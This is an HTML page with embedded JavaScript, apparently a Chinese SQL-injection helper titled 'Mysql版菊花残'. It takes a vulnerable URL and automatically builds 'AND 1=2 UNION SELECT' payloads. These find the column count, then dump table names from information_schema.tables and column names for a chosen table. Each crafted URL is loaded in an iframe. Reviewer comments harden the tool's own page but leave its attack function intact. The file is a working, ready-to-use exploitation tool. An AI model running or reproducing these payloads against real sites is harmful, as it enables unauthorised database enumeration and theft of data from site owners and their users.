<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Mysql版菊花残</title>
<!-- NOTE(review): all three assets are fetched over plaintext http:// and carry
     no integrity= hash, so anyone on the network path can substitute the script
     that then runs in this page with full access to the operator's inputs. Pin
     them to https:// and add Subresource Integrity (integrity="sha384-..."
     crossorigin="anonymous"), or ship local copies next to this file. -->
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.0/css/amazeui.min.css">
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.0/js/amazeui.js"></script>
<script>
$(function () {
var field = ''; // comma-prefixed list of the extra SELECT columns added so far (grown by the click handler below)
var iterator = 1; // number of columns the next UNION SELECT carries; bumped on every click that is not a "refresh"
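/**
 * Hex-encode a string for use as a MySQL 0x... literal (PHP bin2hex port).
 *
 * Based on locutus bin2hex (http://locutus.io/php/bin2hex/) by Kevin van
 * Zonneveld, Onno Marsman, Linuxworld and ntoniazzi. PHP's bin2hex works on
 * bytes, but the earlier JS port emitted each character's UTF-16 code unit,
 * so any non-ASCII character (e.g. a Chinese table name) became a 4-digit
 * value that MySQL reads as two unrelated bytes and the information_schema
 * lookup silently misses. The value is therefore UTF-8 encoded first; ASCII
 * input is encoded exactly as before.
 *
 * @param {*} s value to encode; non-strings are coerced with String()
 * @returns {string} lowercase hex, two digits per UTF-8 byte ('' for '')
 * @throws {URIError} if s contains a lone surrogate (not encodable as UTF-8)
 */
var jsbin2hex = function bin2hex(s) {
  // example 1: bin2hex('Kev')                     -> '4b6576'
  // example 2: bin2hex(String.fromCharCode(0x00)) -> '00'
  // example 3: bin2hex('\u8868')                  -> 'e8a1a8'
  // encodeURIComponent emits UTF-8 bytes as %XX for everything outside its
  // unreserved set and leaves the rest as single ASCII characters.
  var encoded = encodeURIComponent(String(s));
  var out = '';
  for (var i = 0, l = encoded.length; i < l; i++) {
    var ch = encoded.charAt(i);
    if (ch === '%') {
      out += encoded.substr(i + 1, 2).toLowerCase();
      i += 2;
    } else {
      var h = ch.charCodeAt(0).toString(16);
      out += h.length < 2 ? '0' + h : h;
    }
  }
  return out;
};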
/** Current, unprocessed contents of the "injectable URL" text box (#url). */
var url = function () {
  var input = $('#url');
  return input.val();
};
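/**
 * Show the URL that is about to be probed: as text in #injection-url and as
 * the href of the "open in new tab" link #injection-href.
 *
 * The URL is operator input joined to the payload, so it is written with
 * .text() rather than .html(); the previous .html() call parsed it as markup
 * and let anything pasted into #url run as script inside this page.
 *
 * @param {string} url full injection URL to display
 */
var injectionUrl = function (url) {
  $('#injection-url').text(url);
  $('#injection-href').attr('href', url);
};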
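/**
 * Build the UNION SELECT probe for the button that was clicked and load it
 * into the preview iframe.
 *
 * The chosen expression always goes in column 1. From the second click on it
 * is also appended to the remembered column list `field`, so every click that
 * is not a "refresh" widens the SELECT by one column (the operator keeps
 * clicking until the target stops erroring). A "refresh" click rebuilds the
 * previous width with the current limit / table-name inputs.
 *
 * Button classes:
 *   field-test  - plain integer columns (1, 2, 3 ...) to find the width and
 *                 see which column the page echoes
 *   table-test  - group_concat(table_name) from information_schema.tables,
 *                 100 rows from the offset in #table-limit
 *   table-field - group_concat(column_name) for the table named in
 *                 #table-name, 100 rows from the offset in #field-limit
 *   refresh     - same column count as last time, no new column
 *
 * The limit and table-name inputs are concatenated into the payload as typed;
 * there is no validation, a non-numeric limit just yields a malformed probe.
 */
$('.field-test, .table-test, .table-field, .refresh').on('click', function () {
  var str = url() + ' AND 1 =2 UNION SELECT ';
  var export_filed = '';
  var condition = '';
  var limit, table_name, i;
  if ($(this).hasClass('field-test')) {
    // Width probe: the new column is the literal column number.
    str += '1';
    export_filed = iterator;
    condition = "";
  } else if ($(this).hasClass('table-test')) {
    str += export_filed = 'group_concat(a.table_name)';
    limit = $('#table-limit').val();
    condition = ' FROM ( SELECT table_name FROM information_schema.tables LIMIT ' + limit + ', 100 ) AS a'
  } else if ($(this).hasClass('table-field')) {
    // The table name is sent as a 0x... hex literal so the payload needs no
    // quotes; the hex form is echoed into #demo-name for the operator.
    str += export_filed = 'group_concat(a.column_name)';
    limit = $('#field-limit').val();
    table_name = jsbin2hex($('#table-name').val());
    $('#demo-name').val(table_name);
    condition = ' FROM (SELECT column_name FROM information_schema.columns WHERE table_name = 0x' + table_name + ' LIMIT ' + limit + ', 100 ) AS a ';
  }
  if (iterator > 1) {
    // Remember the new column (not on refresh, so the width stays put) and
    // append the whole remembered list after the leading column.
    if (!$(this).hasClass('refresh')) {
      field += ',' + export_filed;
    }
    str += field;
  }
  str += condition;
  $('#view').attr('src', str);
  injectionUrl(str);
  if (!$(this).hasClass('refresh')) {
    // Show "1,2,...,N" so echoed numbers can be matched to columns. `i` is
    // declared above; the old code leaked it as an implicit global.
    var number = '';
    for (i = 1; i <= iterator; i++) {
      number += number == '' ? i : ',' + i;
    }
    $('#injection-num').html(number);
    iterator++;
  }
});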
/**
 * "重置测试": forget the accumulated column list and column count, put the
 * bare URL back into the link/label and clear the column-number hint.
 */
$('.refield-test').on('click', function () {
  iterator = 1;
  field = '';
  $('#injection-num').html('');
  injectionUrl(url());
});
})
</script>
</head>
<body style="background: #f8f8f8;">
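<form class="am-form">
  <fieldset>
    <legend>Mysql版菊花残 <span class="am-text-sm">——By luo</span></legend>
    <div class="am-form-group">
      <input type="text" id="url" placeholder="存在注入的网址">
    </div>
    <div class="am-form-group">
      <!-- Real buttons instead of href="javascript:;" links: the click handlers
           in the head script are bound by class, so the selectors are unchanged,
           and none of these is a submit button, so the form never posts. -->
      <button type="button" class="am-btn am-btn-success am-btn-xs refield-test">重置测试</button>
    </div>
    <div class="am-form-group">
      <button type="button" class="am-btn am-btn-primary am-btn-xs field-test">字段测试</button>
      <button type="button" class="am-btn am-btn-secondary am-btn-xs field-test refresh">更新数据</button>
    </div>
    <div class="am-form-group">
      起止行:
      <input type="text" class="am-inline am-input-sm" id="table-limit" value="0" placeholder="爆表起止行" style="width: 50px;">
      <button type="button" class="am-btn am-btn-danger am-btn-xs table-test">开始爆表</button>
      <button type="button" class="am-btn am-btn-secondary am-btn-xs table-test refresh">更新数据</button>
    </div>
    <div class="am-form-group">
      表名:
      <input type="text" class="am-inline am-input-sm" id="table-name" value="" placeholder="要爆破的表名称" style="width: 100px;">
      <input type="text" class="am-inline am-input-sm" id="demo-name" readonly value="" placeholder="字符串转16进制结果" style="width: 100px;">
      字段起止行:
      <input type="text" class="am-inline am-input-sm" id="field-limit" value="0" placeholder="爆表起止行" style="width: 50px;">
      <button type="button" class="am-btn am-btn-warning am-btn-xs table-field">开始爆表字段</button>
      <button type="button" class="am-btn am-btn-secondary am-btn-xs table-field refresh">更新数据</button>
    </div>
    <div class="am-form-group">
      <p>对应字段数字猜想:<span id="injection-num"></span></p>
      <!-- The link opens the probed site, which is untrusted: noopener denies it
           window.opener, noreferrer keeps this tool's address out of its logs. -->
      <p><a id="injection-href" href="" target="_blank" rel="noopener noreferrer">当前注入URL</a> :<span id="injection-url"></span></p>
    </div>
  </fieldset>
</form>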
<hr data-am-widget="divider" style="" class="am-divider am-divider-dotted am-margin-bottom-0 "/>
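<!-- The probed site is untrusted. sandbox withholds top-navigation, popups,
     modals and downloads so it cannot redirect or spawn windows from this tab
     (scripts, forms and its own origin stay allowed so the page renders as it
     normally would; it is cross-origin, so allow-scripts + allow-same-origin
     does not let it escape the sandbox). no-referrer keeps this tool's URL out
     of the target's access log. -->
<iframe id="view" src="about:blank" title="注入目标页面" width="100%" height="500"
        sandbox="allow-scripts allow-same-origin allow-forms"
        referrerpolicy="no-referrer"></iframe>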
</body>
</html>